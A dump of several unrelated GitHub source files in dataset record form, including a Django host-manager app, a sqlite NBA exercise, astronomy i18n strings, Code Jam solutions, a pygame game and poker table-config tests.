list(models.User.objects.filter(id=a).first().h.all().values_list(\"id\", \"ip\", \"name\"))\n all_host = list(models.Host.objects.all().values_list(\"id\", \"ip\", \"name\"))\n for i in all_host:\n if i not in hosts:\n a_hosts.append(i)\n # print(hosts, a_hosts)\n return HttpResponse(json.dumps({\"hosts\": hosts, \"all_hosts\": a_hosts}))\n # else:\n # print(\"eee\")\n # hosts = [] # 有权限的主机列表\n # all_hosts = [] # 没有权限的主机列表\n # uid = request.POST.get(\"uid\")\n # print(uid)\n # data = models.User.objects.filter(id=uid).first().h.all()\n # all_host = models.Host.objects.all()\n # for i in data:\n # temp = [i.id, i.ip, i.name]\n # hosts.append(temp)\n # for i in all_host:\n # temp = [i.id, i.ip, i.name]\n # if temp in hosts:\n # continue\n # all_hosts.append(temp)\n #\n # return HttpResponse(json.dumps({\"hosts\": hosts, \"all_hosts\": all_hosts}))\n # return HttpResponse(data)\n\n\nclass Login(forms.Form):\n # 字段本身只能验证,内含插件生成html\n name = fields.CharField(\n widget=widgets.Input(attrs={'class': 'form-control', 'placeholder': 'Name'}),\n max_length=20,\n error_messages={\n 'required': '用户名不能为空',\n 'min_length': '最小长度为6',\n }\n )\n pwd = fields.CharField(\n widget=widgets.PasswordInput(attrs={'class': 'form-control', 'placeholder': 'Password'}),\n error_messages={\n 'required': '密码不能为空',\n }\n )\n\n\ndef login(request):\n # 登录\n if request.method == \"GET\":\n obj = Login()\n return render(request, 'login.html', {\"obj\": obj})\n else:\n obj = Login(request.POST)\n ret = obj.is_valid() # 验证输入是否合格\n if ret:\n print(obj.cleaned_data) # 打印用户输入数据\n data = models.User.objects.filter(**obj.cleaned_data).first()\n if data:\n request.session[\"auth\"] = data.ugrup\n request.session[\"name\"] = data.name\n request.session[\"id\"] = data.id\n return redirect(\"/index\")\n else:\n return render(request, 'login.html', {\"obj\": obj, \"status\": \"用户名或密码错误\"})\n else:\n print(obj.errors)\n return render(request, 'login.html', {\"obj\": obj})\n\n\ndef add_host(request):\n server_name = request.POST.get(\"name\")\n ip = request.POST.get(\"ip\")\n port = request.POST.get(\"port\")\n user = request.POST.get(\"user\")\n print(server_name, ip, port, user)\n obj = models.Host(name=server_name, ip=ip, port=port, user=user)\n a = obj.save()\n print(a)\n return redirect(\"/index\")\n\n\ndef host_info(request):\n data = models.Host.objects.filter(id=request.POST.get('id')).first()\n send_data = {\"id\": data.id, \"name\": data.name, \"ip\": data.ip, \"port\": data.port, \"user\": data.users}\n return HttpResponse(json.dumps(send_data))\n\n\ndef host_del(request):\n models.Host.objects.filter(id=request.POST.get('id')).first().delete()\n return HttpResponse(json.dumps({\"status\": \"ok\"}))\n\n\ndef host_edit(request):\n id = request.POST.get(\"id\")\n name = request.POST.get(\"name\")\n ip = request.POST.get(\"ip\")\n port = request.POST.get(\"port\")\n obj = models.Host.objects.filter(id=id).first()\n obj.name = name\n obj.ip = ip\n obj.port = port\n obj.save()\n return HttpResponse(\"ok\")\n\n\ndef login_off(request):\n request.session.delete()\n return redirect(\"/login\")\n\n\nclass fm(forms.Form):\n user = forms.CharField()\n pwd = forms.CharField()\n email = forms.EmailField()\n\n\ndef test(request):\n if request.method == \"GET\":\n return render(request, \"test.html\")\n else:\n dd = request.POST.get(\"dd\")\n print(dd, type(dd))\n a = json.loads(dd)\n print(a, type(a))\n return HttpResponse(\"ok\")\n","repo_name":"topsai/day17","sub_path":"hostmanager/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"28878198061","text":"\"\"\"Bite 195. Analyze NBA Data with sqlite3.\"\"\"\n# pylint: disable=unused-argument,too-many-locals,too-many-arguments\n\nimport csv\nimport os\nimport random\nimport sqlite3\nimport string\nfrom collections import Counter, namedtuple\nfrom pathlib import Path\nfrom statistics import mean\n\nimport requests\n\nDATA_URL = \"https://query.data.world/s/ezwk64ej624qyverrw6x7od7co7ftm\"\nTMP = Path(os.getenv(\"TMP\", \"/tmp\"))\n\nSALT = \"\".join(random.choice(string.ascii_lowercase) for i in range(20))\nDB = TMP / f\"nba_{SALT}.db\"\n\nPlayer = namedtuple(\n \"Player\", (\"name year first_year team college active \" \"games avg_min avg_points\")\n)\n\nconn = sqlite3.connect(DB)\ncur = conn.cursor()\n\n\ndef import_data() -> None:\n \"\"\"Pull down CSV data, convert to sqlite3 database.\"\"\"\n with requests.Session() as session:\n content = session.get(DATA_URL).content.decode(\"utf-8\")\n\n reader = csv.DictReader(content.splitlines(), delimiter=\",\")\n\n players = []\n for row in reader:\n players.append(\n Player(\n name=row[\"Player\"],\n year=row[\"Draft_Yr\"],\n first_year=row[\"first_year\"],\n team=row[\"Team\"],\n college=row[\"College\"],\n active=row[\"Yrs\"],\n games=row[\"Games\"],\n avg_min=row[\"Minutes.per.Game\"],\n avg_points=row[\"Points.per.Game\"],\n )\n )\n\n cur.execute(\n \"\"\"CREATE TABLE IF NOT EXISTS players\n (name, year, first_year, team, college, active,\n games, avg_min, avg_points)\"\"\"\n )\n cur.executemany(\"INSERT INTO players VALUES (?,?,?,?,?,?,?,?,?)\", players)\n conn.commit()\n\n\nimport_data()\n\n\ndef query(\n name=None,\n year=None,\n first_year=None,\n team=None,\n college=None,\n active=None,\n games=None,\n avg_min=None,\n avg_points=None,\n operator=\"LIKE\",\n fields=\"*\",\n):\n \"\"\"Query the sqlite db.\"\"\"\n argv = locals()\n del argv[\"operator\"]\n del argv[\"fields\"]\n\n sql = f\"SELECT {fields} FROM players\"\n params = []\n for key, value in argv.items():\n if value is not None:\n sql += f\" WHERE {key} {operator} ?\"\n params.append(value)\n cur.execute(sql, params)\n return cur.fetchall()\n\n\ndef player_with_max_points_per_game() -> str:\n \"\"\"The player with highest average points per game.\n\n (don't forget to CAST to numeric in your SQL query)\n \"\"\"\n most_ave_points = query(fields=\"name, MAX(CAST(avg_points AS REAL))\")\n return most_ave_points.pop()[0]\n\n\ndef number_of_players_from_duke() -> int:\n \"\"\"Return the number of players with college == Duke University.\"\"\"\n duke_players = query(college=\"Duke University\")\n return len(duke_players)\n\n\ndef avg_years_active_players_stanford() -> float:\n \"\"\"Return average years players from Stanford University are active.\n\n (\"active\" column) Round to two digits.\n \"\"\"\n active_years = query(fields=\"active\", college=\"Stanford University\")\n active_years = [int(entry[0]) for entry in active_years]\n ave_active_years = mean(active_years)\n return round(ave_active_years, 2)\n\n\ndef year_with_most_new_players() -> int:\n \"\"\"Return the year with the most new players.\n\n Hint: you can use GROUP BY on the year column.\n \"\"\"\n sql = \"SELECT year, COUNT(*) FROM players GROUP BY year\"\n cur.execute(sql)\n new_per_year: Counter = Counter()\n for year, count in cur.fetchall():\n new_per_year[int(year)] = count\n return new_per_year.most_common(1).pop()[0]\n","repo_name":"jsh/pybites","sub_path":"195/nba.py","file_name":"nba.py","file_ext":"py","file_size_in_byte":3532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"18735195291","text":"#!/usr/bin/env python3\n\nfrom typing import Union\nfrom .utils import _\n\nfrom kosmorrolib import EventType, MoonPhaseType, ObjectIdentifier, Event\n\n\ndef from_event(event: Event, with_description: bool = True) -> Union[None, str]:\n string, details = {\n EventType.OPPOSITION: (_(\"%s is in opposition\"), None),\n EventType.CONJUNCTION: (_(\"%s and %s are in conjunction\"), None),\n EventType.OCCULTATION: (_(\"%s occults %s\"), None),\n EventType.MAXIMAL_ELONGATION: (\n _(\"Elongation of %s is maximal\"),\n lambda e: \"{:.3n}°\".format(e.details[\"deg\"]),\n ),\n EventType.PERIGEE: (_(\"%s is at its periapsis\"), None),\n EventType.APOGEE: (_(\"%s is at its apoapsis\"), None),\n }.get(event.event_type, (None, None))\n\n if string is None:\n return None\n\n string = string % tuple([from_object(o.identifier) for o in event.objects])\n\n if details is not None and with_description:\n return \"%s (%s)\" % (string, details(event))\n\n return string\n\n\ndef from_moon_phase(moon_phase: MoonPhaseType) -> str:\n string = {\n MoonPhaseType.NEW_MOON: _(\"New Moon\"),\n MoonPhaseType.WAXING_CRESCENT: _(\"Waxing Crescent\"),\n MoonPhaseType.FIRST_QUARTER: _(\"First Quarter\"),\n MoonPhaseType.WAXING_GIBBOUS: _(\"Waxing Gibbous\"),\n MoonPhaseType.FULL_MOON: _(\"Full Moon\"),\n MoonPhaseType.WANING_GIBBOUS: _(\"Waning Gibbous\"),\n MoonPhaseType.LAST_QUARTER: _(\"Last Quarter\"),\n MoonPhaseType.WANING_CRESCENT: _(\"Waning Crescent\"),\n }.get(moon_phase)\n\n if string is None:\n raise RuntimeError(\"Unknown moon phase: %s.\" % moon_phase)\n\n return string\n\n\ndef from_object(identifier: ObjectIdentifier) -> str:\n return {\n ObjectIdentifier.SUN: _(\"Sun\"),\n ObjectIdentifier.MOON: _(\"Moon\"),\n ObjectIdentifier.MERCURY: _(\"Mercury\"),\n ObjectIdentifier.VENUS: _(\"Venus\"),\n ObjectIdentifier.EARTH: _(\"Earth\"),\n ObjectIdentifier.MARS: _(\"Mars\"),\n ObjectIdentifier.JUPITER: _(\"Jupiter\"),\n ObjectIdentifier.SATURN: _(\"Saturn\"),\n ObjectIdentifier.URANUS: _(\"Uranus\"),\n ObjectIdentifier.NEPTUNE: _(\"Neptune\"),\n ObjectIdentifier.PLUTO: _(\"Pluto\"),\n }.get(identifier)\n","repo_name":"Kosmorro/kosmorro","sub_path":"kosmorro/i18n/strings.py","file_name":"strings.py","file_ext":"py","file_size_in_byte":2254,"program_lang":"python","lang":"en","doc_type":"code","stars":55,"dataset":"github-code","pt":"61"}
+{"seq_id":"23588235051","text":"import operator\r\n\r\nt = int(input())\r\n\r\nfor case_num in range(t):\r\n\tline = [int(x) for x in input().split(' ')]\r\n\tn = int(line[0])\r\n\tk = int(line[1])\r\n\tu = float(input())\r\n\tp = [float(x) for x in input().split(' ')]\r\n\tp.sort()\r\n\twhile u > 0:\r\n\t\ts0 = p[0]\r\n\t\ts1 = [(x, i) for i, x in enumerate(p) if x > s0]\r\n\t\tif len(s1) > 0:\r\n\t\t\tidx = s1[0][1]\r\n\t\t\ts1 = s1[0][0]\r\n\t\t\tif u >= (s1 - s0) * idx:\r\n\t\t\t\tfor i in range(idx):\r\n\t\t\t\t\tp[i] += s1 - s0\r\n\t\t\t\tu -= (s1 - s0) * idx\r\n\t\t\telse:\r\n\t\t\t\tfor i in range(idx):\r\n\t\t\t\t\tp[i] += u / idx\r\n\t\t\t\tu = 0\r\n\t\telse:\r\n\t\t\tp = [x + u / n for x in p]\r\n\t\t\tu = 0\r\n\tans = 1\r\n\tfor x in p:\r\n\t\tans *= x\r\n\tprint('Case #%d: %.8f' % (case_num + 1, ans))\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_211/186.py","file_name":"186.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23415590851","text":"import sys\r\n\r\ninfile = open('A-small-attempt0.in','r')\r\noutfile = open('A-small-attempt0.out','w')\r\n\r\nt = int(infile.readline())\r\nfor case in range(1,t+1):\r\n first_selection = int(infile.readline())\r\n first_layout = []\r\n first_layout.append([int(x) for x in infile.readline().split()])\r\n first_layout.append([int(x) for x in infile.readline().split()])\r\n first_layout.append([int(x) for x in infile.readline().split()])\r\n first_layout.append([int(x) for x in infile.readline().split()])\r\n first_row = first_layout[first_selection - 1]\r\n\r\n second_selection = int(infile.readline())\r\n second_layout = []\r\n second_layout.append([int(x) for x in infile.readline().split()])\r\n second_layout.append([int(x) for x in infile.readline().split()])\r\n second_layout.append([int(x) for x in infile.readline().split()])\r\n second_layout.append([int(x) for x in infile.readline().split()])\r\n second_row = second_layout[second_selection - 1]\r\n\r\n matches = []\r\n for first in first_row:\r\n for second in second_row:\r\n if first == second:\r\n matches.append(first)\r\n\r\n outline = 'Case #' + str(case) + ': '\r\n if len(matches) == 1:\r\n outline += str(matches[0]) + '\\n'\r\n elif len(matches) > 1:\r\n outline += 'Bad magician!' + '\\n'\r\n else:\r\n outline += 'Volunteer cheated!' + '\\n'\r\n outfile.write(outline)\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_135/3048.py","file_name":"3048.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23587987571","text":"#!/usr/bin/env python3\nimport math, collections, itertools\nfrom sys import stdin\n\n\ndef readValue(valueType):\n return valueType(stdin.readline())\n\n\ndef readValues(valueType):\n return list(map(valueType, stdin.readline().split()))\n\n\nclass Mouth():\n count = 1\n\n @classmethod\n def answer(cls, answer):\n print(\"Case #{}: {}\".format(cls.count, answer))\n cls.count += 1\n\n\ndef readInput():\n N, K = readValues(int)\n U = readValue(float)\n\n probs = readValues(float)\n\n return N, K, U, probs\n\n\ndef solve(N, K, U, probs):\n EPS = 0.000000000000001\n best = 0\n l, r = 0, 1\n while r - l > EPS:\n mid = (l + r) / 2\n\n needed = 0\n totalProb = 1\n for prob in probs:\n if prob < mid:\n needed += mid - prob\n totalProb *= mid\n else:\n totalProb *= prob\n\n if needed <= U:\n l = mid + EPS\n best = max(best, totalProb)\n else:\n r = mid - EPS\n\n return best\n\n\nif __name__ == '__main__':\n for _ in range(readValue(int)):\n Mouth.answer(solve(*readInput()))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_211/102.py","file_name":"102.py","file_ext":"py","file_size_in_byte":1129,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23563887861","text":"import sys\r\n#sys.stdin = open('input.in','r')\r\n#sys.stdout = open('output.in','w')\r\nt=int(input())\r\ntest = 0\r\nwhile testord(n[i])):\r\n n[i]='9'\r\n j=i-1\r\n if(f==False):\r\n n[j]=chr(ord(n[j])-1)\r\n f=True\r\n while(j>0 and ord(n[j]) total:\n print(f\"The budget for the movie is enough! We have {diff:.2f} leva left!\")\nelse:\n print(f\"The director needs {diff:.2f} leva more!\")\n","repo_name":"Dimitrov-S-Dev-Python/SoftUni_Python_Basics","sub_path":"Exams_Tasks/PB_15_06_2019/Movie_Destination.py","file_name":"Movie_Destination.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"1898746102","text":"import triad_openvr\nimport time\n\nfrom PyQt5 import QtCore\n\n\nclass ListenerWorker(QtCore.QObject):\n obtained_sample = QtCore.pyqtSignal(str)\n finished = QtCore.pyqtSignal()\n\n def __init__(self, parent=None):\n QtCore.QObject.__init__(self, parent)\n\n self.interval = 1/250\n\n self.vr = None\n self.active = True\n\n def start(self):\n print(\"Starting Listener Thread\")\n\n # self.vr = triad_openvr.triad_openvr()\n\n self.main_loop()\n self.finished.emit()\n\n def main_loop(self):\n i = 0\n while self.active:\n start_time = time.time()\n\n i += 1\n # self.obtained_sample.emit(\"%s %s\" % (start_time, i))\n\n sleep_time = self.interval - (time.time() - start_time)\n if sleep_time > 0:\n # QtCore.QThread.msleep(int(sleep_time*1000))\n time.sleep(sleep_time)\n print(i)\n\n def close(self):\n # self.vr.close_triad()\n\n self.active = False\n print(\"Active CLOSED: %s\" % self.active)\n\n\nif __name__ == '__main__':\n # interval = 1/refresh_rate\n #\n # v = vr.triad_openvr()\n # v.print_discovered_objects()\n #\n # while True:\n # start = time.time()\n # text = \"\"\n # for pose in v.devices[device_name].get_pose_euler():\n # text += \"%s.4f\" % pose\n # text += \" \"\n # print(\"\\r\" + text, end=\"\")\n # sleep_time = interval-(time.time()-start)\n # if sleep_time > 0:\n # time.sleep(sleep_time)\n pass\n","repo_name":"JaydenB/OpenVR-Recorder","sub_path":"openvr.py","file_name":"openvr.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"1018470558","text":"from django.db import models\nfrom django.utils.translation import ugettext as _\nfrom Lunchbreak.exceptions import LunchbreakException\nfrom Lunchbreak.mixins import CleanModelMixin\n\nfrom ..managers import OrderManager\nfrom .ordered_food import OrderedFood\n\n\nclass AbstractOrder(CleanModelMixin, models.Model):\n\n class Meta:\n abstract = True\n\n def __str__(self):\n return _('%(user)s, %(store)s (onbevestigd)') % {\n 'user': self.user.name,\n 'store': self.store\n }\n\n objects = OrderManager()\n\n user = models.ForeignKey(\n 'User',\n on_delete=models.CASCADE,\n verbose_name=_('gebruiker'),\n help_text=_('Gebruiker.')\n )\n store = models.ForeignKey(\n 'lunch.Store',\n on_delete=models.CASCADE,\n verbose_name=_('winkel'),\n help_text=_('Winkel.')\n )\n\n @classmethod\n def is_valid(cls, orderedfood, **kwargs):\n if orderedfood is None or len(orderedfood) == 0:\n raise LunchbreakException(\n 'Een bestelling moet etenswaren hebben.'\n )\n\n try:\n for f in orderedfood:\n if not isinstance(f, dict) and not isinstance(f, OrderedFood):\n raise ValueError(\n 'Order creation requires a list of dicts or OrderedFoods.'\n )\n except TypeError:\n raise LunchbreakException(\n 'Een bestelling moet etenswaren hebben.'\n )\n","repo_name":"ssprasad100/Lunchbreak_backend_again","sub_path":"lunchbreak/customers/models/abstract_order.py","file_name":"abstract_order.py","file_ext":"py","file_size_in_byte":1494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"6510896354","text":"from __future__ import division\nimport os\nimport re\nimport sys\nimport urllib\n\ndef getEmailListStrVersion(sourceFile):\n allEmails,setEmails=getTheEmails(sourceFile)\n emStr=\"\\n\".join(allEmails)\n return emStr\n\ndef getTheEmails(sourceFile):\n emailPattern=r'[\\w\\.-]+@[\\w\\.-]+'\n f=open(sourceFile,'r')\n allLines=f.read()\n f.close()\n allMatchedEmails=re.findall(emailPattern,allLines)\n return allMatchedEmails,list(set(allMatchedEmails))\n\ndef emailsWeightImportance(allEmailLists,setEmailList):\n emailsWeight={}\n for email in setEmailList:\n emailsWeight[email]=[allEmailLists.count(email),round(allEmailLists.count(email)/len(allEmailLists),2)]\n return emailsWeight\n\ndef domainSplitting(setEmails):\n domainList=[]\n for email in setEmails:\n splitAddress = email.split('@')\n domain = str(splitAddress[1])\n #print (domain)\n domainList.append(domain)\n domainList=list(set(domainList))\n domainStr=\"\\n\".join(domainList)\n return domainStr,domainList\n","repo_name":"jahidul-arafat/JALPA-log-forensics-Python-Toolkit","sub_path":"source/emailManupulator.py","file_name":"emailManupulator.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16353705955","text":"# 21921 - 블로그 (실버3) \n# 슬라이딩윈도우 알고리즘\nfrom sys import stdin as s\n#제출 시 주석 필수\ns=open(\"input.txt\",\"rt\")\n\n[n, window_size] = list(map(int, s.readline().split(' ')));\ninput_arr =list(map(int, s.readline().split(' ')));\n\nsum_arr=[];\nfirst_sum =0;\nfor i in range(0,window_size):\n first_sum+=input_arr[i];\nsum_arr.append(first_sum);\n\n#교집합이 생기므로 슬라이딩 윈도우 사용하여 효율성 높이기\ni=0;\nstart=0;\nend=start+window_size;\nwhile(1):\n if (end == n): break;\n sum = sum_arr[i] - input_arr[start]+ input_arr[end];\n sum_arr.append(sum);\n i+=1;\n start+=1;\n end=start+window_size;\n\n#최대 방문자 수 및 개수 구하기\nmax_cnt = max(sum_arr);\nif (max_cnt == 0): print('SAD');\nelse: \n print(max_cnt);\n print(sum_arr.count(max_cnt))\n\n ","repo_name":"Sae-byeol/algorithm_PY","sub_path":"implements/21921.py","file_name":"21921.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"5318236440","text":"import pygame as pg\nfrom settings import *\nimport random\nimport time\n\n\nclass Player(pg.sprite.Sprite):\n\tdef __init__(self, game, x, y, hp, prot, atk):\n\t\t#PYGAME\n\t\tself.groups = game.all_sprites\n\t\tpg.sprite.Sprite.__init__(self, self.groups)\n\t\tself.game = game\n\t\tself.image = pg.Surface((TILESIZE, TILESIZE))\n\t\tself.image.fill(GREEN)\n\t\tself.rect = self.image.get_rect()\n\t\tself.x = x\n\t\tself.y = y\n\n\t\t#Player attr\n\t\tself.hp = hp\n\t\tself.prot = prot\n\t\tself.hp_max = hp\n\t\tself.atk = atk\n\t\tself.armor = {'head': None, 'chest': None, 'legs': None, 'feet': None}\n\t\tself.weapon = None\n\t\tself.p_coins = 0\n\t\t\n\n\tdef move(self, dx=0, dy=0):\n\t\tif self.game.inventory.display_inventory != True:\n\t\t\tself.x += dx\n\t\t\tself.y += dy\n\t\t\tself.check_collision()\n\n\tdef addHp(self, hp_gain):\n\t\tself.hp += hp_gain\n\t\tif self.hp > self.hp_max:\n\t\t\tself.hp = self.hp_max\n\n\tdef addProt(self, prot_gain):\n\t\tself.prot += prot_gain\n\n\tdef equip_armor(self, item):\n\t\tif self.armor[item.slot] != None:\n\t\t\tself.unequip_armor(item.slot)\n\t\tself.armor[item.slot] = item\n\t\tself.prot += item.prot\n\n\tdef unequip_armor(self, slot):\n\t\tif self.armor[slot] != None:\n\t\t\tself.prot -= self.armor[slot].prot\n\t\t\tself.armor[slot] = None\n\n\tdef equip_weapon(self, weapon):\n\t\tif self.weapon != None:\n\t\t\tself.unequip_weapon()\n\t\tself.weapon = weapon\n\t\tself.atk += weapon.atk\n\n\tdef unequip_weapon(self):\n\t\tif self.weapon != None:\n\t\t\tself.atk -= self.weapon.atk\n\t\t\tself.weapon = None\n\n\tdef check_collision(self):\n\t\tself.check_coin()\n\n\tdef check_coin(self):\n\t\tif self.x == self.game.coin.x and self.y == self.game.coin.y:\n\t\t\tself.add_coin()\n\t\t\tself.game.new_coin()\n\n\tdef add_coin(self):\n\t\tself.p_coins += 10\n\n\tdef update(self):\n\t\tself.rect.x = self.x * TILESIZE\n\t\tself.rect.y = self.y * TILESIZE\n\n\nclass Coin(pg.sprite.Sprite):\n\tdef __init__(self, game, x, y):\n\t\tself.groups = game.all_sprites, game.all_coins\n\t\tpg.sprite.Sprite.__init__(self, self.groups)\n\t\tself.game = game\n\t\tself.image = pg.image.load('img/coin.png').convert_alpha()\n\t\tself.rect = self.image.get_rect()\n\t\tself.x = x\n\t\tself.y = y\n\n\tdef update(self):\n\t\tself.rect.x = self.x * TILESIZE+COINOFFSET\n\t\tself.rect.y = self.y * TILESIZE+COINOFFSET","repo_name":"AlvarMarkhester/pg-inventory-system","sub_path":"sprites.py","file_name":"sprites.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"}
+{"seq_id":"23604130261","text":"fin = open('E:\\\\cj\\\\B-large.in', 'r')\r\nlines = fin.readlines()\r\nfin.close()\r\n\r\nfout = open('E:\\\\cj\\\\b.out', 'w')\r\n\r\ndef gcd(a, b):\r\n while b > 0:\r\n a, b = b, a % b\r\n return a\r\n\r\ncase = 0\r\ncases = int(lines[0])\r\nlp = 1\r\nfor case in xrange(1, cases + 1):\r\n l = lines[lp]\r\n X = [int(x) for x in l.split()]\r\n N = X[0]\r\n t = X[1:]\r\n\r\n gisa = abs(t[0] - t[1])\r\n\r\n for i in xrange(0, N):\r\n for j in xrange(i + 1, N):\r\n diff = abs(t[i] - t[j])\r\n gisa = gcd(max(gisa, diff), min(gisa, diff))\r\n\r\n fout.write('Case #%d: %s\\n' % (case, (gisa - (t[0] % gisa))%gisa))\r\n lp += 1\r\n\r\nfout.close()\r\n \r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_54/63.py","file_name":"63.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"23133154180","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nimport tempfile\nimport unittest\n\nfrom pokernetwork import tableconfigutils\n\n\nSERVER_CONFIG_TEMPLATE = \"\"\"\\\n\n\n%s\n \"\"\"\n\n\nTABLE_CONFIG_TEMPLATE = \"\"\"\\\n\n\n%s\n \"\"\"\n\n\nTABLE_NODE_TEMPLATE = \"\"\"\\\n\"\"\"\n\n\nSERVER_CONFIG_TABLES = [\n ('One', 'holdem', '5-10-no-limit'),\n ('Two', 'omaha', '2-4-limit'),\n ('Four', 'omaha8', '.01-.02-pot-limit'),\n ('Ten', 'stud', '10-20-limit'),\n ('Eleven', 'stud', '30-60-limit')\n]\n\n\nTABLE_CONFIGS = {\n 'holdem.limit.xml': [('One', 'holdem', '2-4-limit'),\n ('Two', 'holdem', '10-20-limit')],\n 'holdem.no-limit.xml': [('Three', 'holdem', '.02-.04-no-limit'),\n ('Four', 'holdem', '.05-.10-no-limit', '6'),\n ('Five', 'holdem', '100-200-no-limit')],\n 'omaha.limit.xml': [('Six', 'omaha', '2-4-limit'),\n ('Seven', 'omaha', '10-20-limit', '8')],\n 'omaha8.limit.xml': [('Eight', 'omaha8', '20-40-limit'),\n ('Nine', 'omaha8', '5-10-limit')]\n}\n\n\n# result of merging SERVER_CONFIG_TABLES with tables in TABLE_CONFIGS\nMERGED_TABLES = [\n ('One', 'holdem', '2-4-limit'),\n ('Two', 'holdem', '10-20-limit'),\n ('Three', 'holdem', '.02-.04-no-limit'),\n ('Four', 'holdem', '.05-.10-no-limit', '6'),\n ('Five', 'holdem', '100-200-no-limit'),\n ('Six', 'omaha', '2-4-limit'),\n ('Seven', 'omaha', '10-20-limit', '8'),\n ('Eight', 'omaha8', '20-40-limit'),\n ('Nine', 'omaha8', '5-10-limit'),\n ('Ten', 'stud', '10-20-limit'),\n ('Eleven', 'stud', '30-60-limit')\n]\n\n\ndef create_table_dict(name, variant, betting_structure, seats='10'):\n return {'name': name, 'variant': variant,\n 'betting_structure': betting_structure, 'seats': seats}\n\n\ndef create_table_xml_entry(table_properties):\n return TABLE_NODE_TEMPLATE % table_properties\n\n\ndef create_config(config_template, tables):\n table_xml_entries = []\n for table in tables:\n table_properties = create_table_dict(*table)\n table_xml_entries.append(create_table_xml_entry(table_properties))\n return config_template % '\\n'.join(table_xml_entries)\n\n\nclass DummyServerConfig():\n def __init__(self, table_descriptions,\n table_node_xpath=tableconfigutils.DEFAULT_TABLE_NODE_XPATH):\n self.path = None\n self.table_descriptions = table_descriptions\n self.table_node_xpath = table_node_xpath\n\n def reload(self):\n pass\n\n def headerGetProperties(self, name):\n if name is self.table_node_xpath:\n return self.table_descriptions\n return []\n\n\nclass TableConfigUtilsTests(unittest.TestCase):\n @classmethod\n def setUpClass(cls):\n cls.config_basedir = tempfile.mkdtemp()\n cls.server_config_path = os.path.join(cls.config_basedir,\n 'poker.server.xml')\n with open(cls.server_config_path, 'w+t') as server_config:\n contents = create_config(SERVER_CONFIG_TEMPLATE,\n SERVER_CONFIG_TABLES)\n server_config.write(contents)\n\n cls.table_configs_dir = os.path.join(cls.config_basedir, 'tables.d')\n os.mkdir(cls.table_configs_dir)\n\n cls.table_config_paths = []\n for config_filename, tables in TABLE_CONFIGS.iteritems():\n config_path = os.path.join(cls.table_configs_dir, config_filename)\n cls.table_config_paths.append(config_path)\n with open(config_path, 'w+t') as table_config:\n contents = create_config(TABLE_CONFIG_TEMPLATE, tables)\n table_config.write(contents)\n\n @classmethod\n def tearDownClass(cls):\n for config_path in cls.table_config_paths:\n os.remove(config_path)\n os.removedirs(cls.table_configs_dir)\n\n def test_parse_table_config(self):\n tables = tableconfigutils.parse_table_config(self.server_config_path)\n assert len(tables) == len(SERVER_CONFIG_TABLES)\n\n def test_parse_table_configs(self):\n tables = tableconfigutils.parse_table_configs(self.table_configs_dir)\n assert len(tables) == sum(len(tables) for tables in\n TABLE_CONFIGS.values())\n\n def _compare_tables(self, tables_a, tables_b):\n \"\"\"\n Returns True if both lists of tables contain the same table entries\n (order is not important).\n\n `tables_a`: a list of dicts containing table properties as keys\n `tables_b`: a list of dicts containing table properties as keys\n \"\"\"\n if len(tables_a) != len(tables_b):\n return False\n\n seen = {}\n for table in tables_a:\n seen[table['name']] = table\n\n for table in tables_b:\n table_name = table['name']\n if table_name not in seen or table != seen[table_name]:\n return False\n return True\n\n def test_merge_tables_with_no_tables(self):\n assert tableconfigutils.merge_tables([], []) == []\n\n def test_merge_tables_with_no_server_config_tables(self):\n table_config_tables = [\n create_table_dict('One', 'holdem', '2-4-limit'),\n create_table_dict('Two', 'holdem', '5-10-no-limit'),\n create_table_dict('Three', 'omaha8', '3-6-limit')\n ]\n merged_tables = tableconfigutils.merge_tables([], table_config_tables)\n assert self._compare_tables(merged_tables, table_config_tables)\n\n def test_merge_tables_with_no_table_config_tables(self):\n server_config_tables = [\n create_table_dict('One', 'holdem', '2-4-limit'),\n create_table_dict('Two', 'holdem', '5-10-no-limit'),\n create_table_dict('Five', 'omaha', '.10-.20-pot-limit'),\n create_table_dict('Six', 'omaha8', '3-6-limit')\n ]\n merged_tables = tableconfigutils.merge_tables(server_config_tables, [])\n assert self._compare_tables(merged_tables, server_config_tables)\n\n def test_get_all_table_descriptions(self):\n server_config_tables = [create_table_dict(*table) for table in\n SERVER_CONFIG_TABLES]\n server_config = DummyServerConfig(server_config_tables)\n table_descriptions = tableconfigutils.get_table_descriptions(\n server_config, self.table_configs_dir)\n\n expected_tables = [create_table_dict(*table) for table in MERGED_TABLES]\n\n assert self._compare_tables(table_descriptions, 